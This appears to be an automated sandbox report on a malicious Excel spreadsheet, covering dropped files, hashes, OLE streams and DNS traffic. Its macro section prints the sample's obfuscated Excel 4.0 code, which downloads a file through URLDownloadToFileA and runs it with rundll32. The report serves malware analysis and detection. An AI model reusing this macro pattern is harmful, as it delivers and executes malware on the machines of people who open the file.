                                                                                                                                                    unknown

                                                                                                                                                    Contacted IPs

                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                    Public

                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious

                                                                                                                                                    Private

                                                                                                                                                    IP
                                                                                                                                                    192.168.2.1

                                                                                                                                                    General Information

                                                                                                                                                    Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                    Analysis ID:433165
                                                                                                                                                    Start date:11.06.2021
                                                                                                                                                    Start time:12:10:33
                                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                                    Overall analysis duration:0h 4m 40s
                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                    Report type:light
                                                                                                                                                    Sample file name:document-447482460.xls
                                                                                                                                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                    Run name:Potential for more IOCs and behavior
                                                                                                                                                    Number of analysed new started processes analysed:25
                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                    Technologies:
                                                                                                                                                    • HCA enabled
                                                                                                                                                    • EGA enabled
                                                                                                                                                    • HDC enabled
                                                                                                                                                    • AMSI enabled
                                                                                                                                                    Analysis Mode:default
                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                    Detection:MAL
                                                                                                                                                    Classification:mal88.troj.expl.evad.winXLS@3/6@4/1
                                                                                                                                                    EGA Information:Failed
                                                                                                                                                    HDC Information:Failed
                                                                                                                                                    HCA Information:
                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                    Cookbook Comments:
                                                                                                                                                    • Adjust boot time
                                                                                                                                                    • Enable AMSI
                                                                                                                                                    • Found application associated with file extension: .xls
                                                                                                                                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                    • Attach to Office via COM
                                                                                                                                                    • Scroll down
                                                                                                                                                    • Close Viewer
                                                                                                                                                    Warnings:
                                                                                                                                                    Show All
                                                                                                                                                    • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 40.88.32.150, 13.64.90.137, 52.109.88.177, 52.109.8.22, 184.30.20.56, 20.50.102.62, 2.20.142.210, 2.20.142.209, 20.54.26.129, 20.82.210.154, 92.122.213.194, 92.122.213.247
                                                                                                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, skypedataprdcoleus15.cloudapp.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, ris.api.iris.microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                    Simulations

                                                                                                                                                    Behavior and APIs

                                                                                                                                                    No simulations

                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                    IPs

                                                                                                                                                    No context

                                                                                                                                                    Domains

                                                                                                                                                    No context

                                                                                                                                                    ASN

                                                                                                                                                    No context

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    No context

                                                                                                                                                    Dropped Files

                                                                                                                                                    No context

                                                                                                                                                    Created / dropped Files

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\B2FA2616-4E04-44C4-B453-68F97B8615EA
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):134922
                                                                                                                                                    Entropy (8bit):5.369086528508336
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:TcQIKNEeBXA3gBwlpQ9DQW+z7534ZliKWXboOilX5ENLWME9:/EQ9DQW+ziXOe
                                                                                                                                                    MD5:F47BBC66D8A6714B7B50C91EBF8FC3AB
                                                                                                                                                    SHA1:B7E5570FDA0007606195CCF46D18B7332EB820DD
                                                                                                                                                    SHA-256:EEA1E9C2ADBD0F95EEC402C868C43CA2C38689F49BD8AE128C1994521CF6FC38
                                                                                                                                                    SHA-512:F25E4A926550E289844F8841843A14A4F5F3BE3C909FE83F84E1F34A84EA9350808C0318FC2D438E90DAD11FA79F39281AD6FA01345EDD7A90C4A32ECD2BF745
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-11T10:11:40">.. Build: 16.0.14209.30527-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DE910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:data
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):62062
                                                                                                                                                    Entropy (8bit):7.671689438222587
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:7GsvcetGN9KPMa9G89OV97o+9YfSxO3kZ3miMI:7G5WGN9iMa9G89OV9c+9aSxO3kZ3D
                                                                                                                                                    MD5:A791857B6CF8DCFDE7F1C7E45791F1B1
                                                                                                                                                    SHA1:501196A64B13A93CDBCD63AC73E0DA6018F27753
                                                                                                                                                    SHA-256:90FCC9482B3791A73F64E5B22CE62006F15D828881879A0E202B5819A0498F02
                                                                                                                                                    SHA-512:689498F3BF69AA52AF5342A2DA768758CCA523E07F395358EA369A10B7479B837F2508983A156E6B65AC1BF5C15AB532C97F5A1473B41B52904205CD92216B1C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: .U.N.0..4..y;J\X..j.a.......mb./....k7t.....f.G..t|3.Z.]=c....5.V..N*....w..U1......1....o...X....).K...@l.GK+...$..:.A,.C~>.\p.lB..9.l....Su....'.v.....Z.L...|'b....x...D.....l.n.P...O..4....{.dt."...S.*.'..u<Lt.!d1.{...*.........-m`P..;....j..4.qa9wn..'..X.J.nJ......\#......(.d...................`..O...6.F.c90.......!/..7_hF....O.vC:..C@y..xv'7.{...-.....D#......D...-.>}..w..H.<...^g_F..0$...k.l.i......E.....l........PK..........!..%b.............[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Fri Jun 11 18:11:42 2021, atime=Fri Jun 11 18:11:42 2021, length=12288, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):904
                                                                                                                                                    Entropy (8bit):4.65986262147223
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:8cXUNuElPCH2YgM/YMht8+WrjAZ/2bD+LC5Lu4t2Y+xIBjKZm:86gMheAZiD/87aB6m
                                                                                                                                                    MD5:D8BC062DC940254CCAE11B3E13CE6A46
                                                                                                                                                    SHA1:1644C9AA695D79A7B36CA8E9C514861E3A59EEAD
                                                                                                                                                    SHA-256:2DFDAF350F38E23C844FB0F1B18677579279C2E619BD89F11DB5CA183FB3ECEF
                                                                                                                                                    SHA-512:58D5A8F8B713A7694EC35CB49CFDC8EA3D74CBCEDE9E2495CF474BA12E55DE84E108B4DDB592B267F2B5178DE2F633BB2972B7944B9884CEF655D2439999C3C4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F........N....-.......^..[....^...0......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rk.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny..Rk......S.....................B&.h.a.r.d.z.....~.1......Rv...Desktop.h.......Ny..Rv......Y..............>.....a...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-447482460.xls.LNK
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:44 2020, mtime=Fri Jun 11 18:11:42 2021, atime=Fri Jun 11 18:11:42 2021, length=88576, window=hide
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2190
                                                                                                                                                    Entropy (8bit):4.715394046805071
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:8tWgMV05EAW8GDdsuo7aB6mytWgMV05EAW8GDdsuo7aB6m:8sLKTW8Ssu9B6psLKTW8Ssu9B6
                                                                                                                                                    MD5:4D3FB934FBC20D7748420A0E692AB209
                                                                                                                                                    SHA1:38468D154CEA3C2001D560B62AFFEEFA35BA6BB8
                                                                                                                                                    SHA-256:EEBA352EDE8311DC916F1220BE66F37FCE14ADF4DD67A5D03E34BE4ACBEC996C
                                                                                                                                                    SHA-512:2C2239BC1DBFB57F868A08306D2E03AFE73444BBE0DC2CB78613CA131470AF5E76795FD3F432BA726D134926C3B95DB04CCA951B07240CE435F62045BF8D6375
                                                                                                                                                    Malicious:true
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: L..................F.... ....f-.:.....!..^....!..^...Z...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...Rk.....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny..Rk......S.....................B&.h.a.r.d.z.....~.1.....>Q{x..Desktop.h.......Ny..Rk......Y..............>......^%.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2..Z...Rq. .DOCUME~1.XLS..^......>Qwx.Rq.....h.........................d.o.c.u.m.e.n.t.-.4.4.7.4.8.2.4.6.0...x.l.s.......\...............-.......[...........>.S......C:\Users\user\Desktop\document-447482460.xls..-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.4.4.7.4.8.2.4.6.0...x.l.s.........:..,.LB.)...As...`.......X.......651689...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.
                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):119
                                                                                                                                                    Entropy (8bit):4.713137091871395
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:oyBVomMY9LRRdzdJMUZELRRdzdJMUmMY9LRRdzdJMUv:dj6Y9LzdEmELzdEmY9LzdE2
                                                                                                                                                    MD5:812CFD99E83F2DE14C27E8EE48BAEEEB
                                                                                                                                                    SHA1:F7506181AFE0002EB238C9D4F7B46B3E28D05A16
                                                                                                                                                    SHA-256:1F0F16DF515AA7BD86D9C4C3BB856EA2E3901FF9C1C7AAD74DED15493198E9BB
                                                                                                                                                    SHA-512:59E3B4B44BC020E34096D308A2B4F154B187146EF7A6769334327FA7E845E5B867A468FF923EA0877D0D6F5C3FF53502B3BC0D5074DF53F5D53F3DF08665CEB0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: Desktop.LNK=0..[xls]..document-447482460.xls.LNK=0..document-447482460.xls.LNK=0..[xls]..document-447482460.xls.LNK=0..
                                                                                                                                                    C:\Users\user\Desktop\AF910000
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):122320
                                                                                                                                                    Entropy (8bit):4.290465005283651
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:uhcKoSsxzNDZLDZjlbR868O8Ku5LXkxEtjPOtioVjDGUU1qfDlaGGx+cL2QqCAH0:OcKoSsxzNDZLDZjlbR868O8Ku5LXkxEb
                                                                                                                                                    MD5:BF2E7D7C8F425861391F4619F9851B2E
                                                                                                                                                    SHA1:3248973D98B319187E6F572FD6187E4DF09A14E7
                                                                                                                                                    SHA-256:8548D058024261383A20D1A26AE791A80E6FD5212494434D0B4DCFEBC2CAB107
                                                                                                                                                    SHA-512:F6FCCCBD0A71B447D620615A94D3EA9AE86A9F225A07AF4A117F60CA27DFF3A5FBED34D9ABFAA7A0BD08C4CA2C6B2A3BC9F6CD9A5CFF4A5E6E4CFE1BCA348FAC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview: ........T8..........................\.p.... B.....a.........=.............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.............

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Feb 26 09:29:22 2021, Security: 0
                                                                                                                                                    Entropy (8bit):3.4145380978437365
                                                                                                                                                    TrID:
                                                                                                                                                    • Microsoft Excel sheet (30009/1) 78.94%
                                                                                                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                                                                                                                                    File name:document-447482460.xls
                                                                                                                                                    File size:88576
                                                                                                                                                    MD5:c956ee532ca3530d1f8ffa585e6fe375
                                                                                                                                                    SHA1:f99efeea7c2ca81ffbbd59ee904ae81cf44b3493
                                                                                                                                                    SHA256:8c00f69352886727d9ad19769e77bcfece11f499fb3da89dfb40396ccb06b330
                                                                                                                                                    SHA512:16092ee5da7b51801fa3a002f7ef54e01376a330b4bd2bfb286f2d668402b32acf9cdc139e98193ed73d4148fb7f86e515534d0124aeb63f85162ddff72cb861
                                                                                                                                                    SSDEEP:1536:tIcKoSsxz1PDZLDZjlbR868O8KWc03Y7uDphYHceXVhca+fMHLtyeGx2zZ8dIOil:tIcKoSsxzNDZLDZjlbR868O8KWc03Y7D
                                                                                                                                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                    Static OLE Info

                                                                                                                                                    General

                                                                                                                                                    Document Type:OLE
                                                                                                                                                    Number of OLE Files:1

                                                                                                                                                    OLE File "document-447482460.xls"

                                                                                                                                                    Indicators

                                                                                                                                                    Has Summary Info:True
                                                                                                                                                    Application Name:Microsoft Excel
                                                                                                                                                    Encrypted Document:False
                                                                                                                                                    Contains Word Document Stream:False
                                                                                                                                                    Contains Workbook/Book Stream:True
                                                                                                                                                    Contains PowerPoint Document Stream:False
                                                                                                                                                    Contains Visio Document Stream:False
                                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                                    Flash Objects Count:
                                                                                                                                                    Contains VBA Macros:True

                                                                                                                                                    Summary

                                                                                                                                                    Code Page:1251
                                                                                                                                                    Author:
                                                                                                                                                    Last Saved By:
                                                                                                                                                    Create Time:2006-09-16 00:00:00
                                                                                                                                                    Last Saved Time:2021-02-26 09:29:22
                                                                                                                                                    Creating Application:Microsoft Excel
                                                                                                                                                    Security:0

                                                                                                                                                    Document Summary

                                                                                                                                                    Document Code Page:1251
                                                                                                                                                    Thumbnail Scaling Desired:False
                                                                                                                                                    Contains Dirty Links:False
                                                                                                                                                    Shared Document:False
                                                                                                                                                    Changed Hyperlinks:False
                                                                                                                                                    Application Version:917504

                                                                                                                                                    Streams

                                                                                                                                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:4096
                                                                                                                                                    Entropy:0.318330155209
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E x c
                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 9f 00 00 00 02 00 00 00 e3 04 00 00
                                                                                                                                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                                                                                    General
                                                                                                                                                    Stream Path:\x5SummaryInformation
                                                                                                                                                    File Type:data
                                                                                                                                                    Stream Size:4096
                                                                                                                                                    Entropy:0.253094628
                                                                                                                                                    Base64 Encoded:False
                                                                                                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . { . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 78310
                                                                                                                                                    General
                                                                                                                                                    Stream Path:Workbook
                                                                                                                                                    File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                    Stream Size:78310
                                                                                                                                                    Entropy:3.6159661459
                                                                                                                                                    Base64 Encoded:True
                                                                                                                                                    Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . .
                                                                                                                                                    Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                    Macro 4.0 Code

                                                                                                                                                    ,,,,,,,,,,,,,,,egist,,,,,,,,,,,,,,,,,,erServer,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,..\nxckew.wle,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,nlo,adTo,,,,,,,,,,,,,,,,,Fi,le,,,,,,,,,,,,,,,,,Dow,,,,,,,,,,,,,,,,,,U,R,,,,,,"=FORMULA.FILL(before.2.2.29.sheet!AR19&""2 "",AD15)","=FORMULA.FILL(before.2.2.29.sheet!AS19,AE15)","=FORMULA.FILL(before.2.2.29.sheet!AU14,AF15)","=FORMULA.FILL(AS3&AS4,AG15)",,,,,,,,,,,,,,UR,LMon,,,,,,,,,,,,,,,,,,=AE14(),=AF14(),=AG14(),=AL19(),,,,,,,,,,,,,,,,,=before.2.2.29.sheet!AL24(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(AF15&AV14,AO13&AP13&""L""&AO12&AO10&AP10&AO11&AP11&""A"",AN19&AN20,0,Doc2!AA100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.2.29.sheet!AS8,0)",,JJC,,,,rundll3,",DllR",,,,,,,,,,,,,CBB,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&EXEC(""""&""""&""""&""""&""""&""""&""""&""""&before.2.2.29.sheet!AD15&before.2.2.29.sheet!AS8&before.2.2.29.sheet!AE15&AG15)",,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,

                                                                                                                                                    Network Behavior

                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    06/11/21-12:05:59.991593ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                    06/11/21-12:06:01.008111ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8
                                                                                                                                                    06/11/21-12:06:03.025969ICMP402ICMP Destination Unreachable Port Unreachable192.168.2.228.8.8.8

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    UDP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jun 11, 2021 12:11:27.035574913 CEST6015253192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:27.088500023 CEST53601528.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:27.866040945 CEST5754453192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:27.918148041 CEST53575448.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:28.975960970 CEST5598453192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:29.026182890 CEST53559848.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:30.171489000 CEST6418553192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:30.221452951 CEST53641858.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:31.011501074 CEST6511053192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:31.066396952 CEST53651108.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:31.914165020 CEST5836153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:31.964677095 CEST53583618.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:34.503659964 CEST6349253192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:34.556998014 CEST53634928.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:38.800736904 CEST6083153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:38.853760958 CEST53608318.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:39.634551048 CEST6010053192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:39.688991070 CEST53601008.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:39.822463989 CEST5319553192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:39.881043911 CEST53531958.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:40.286566973 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:40.345336914 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:41.328238964 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:41.389719009 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:42.395558119 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:42.454371929 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:43.356519938 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:43.461911917 CEST4956353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:43.520872116 CEST53495638.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:44.390877008 CEST5014153192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:44.393672943 CEST5302353192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:44.452047110 CEST53501418.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:44.532388926 CEST5135253192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:44.591171026 CEST53513528.8.8.8192.168.2.3
                                                                                                                                                    Jun 11, 2021 12:11:45.325023890 CEST5934953192.168.2.38.8.8.8
                                                                                                                                                    Jun 11, 2021 12:11:45.375216961 CEST53593498.8.8.8192.168.2.3
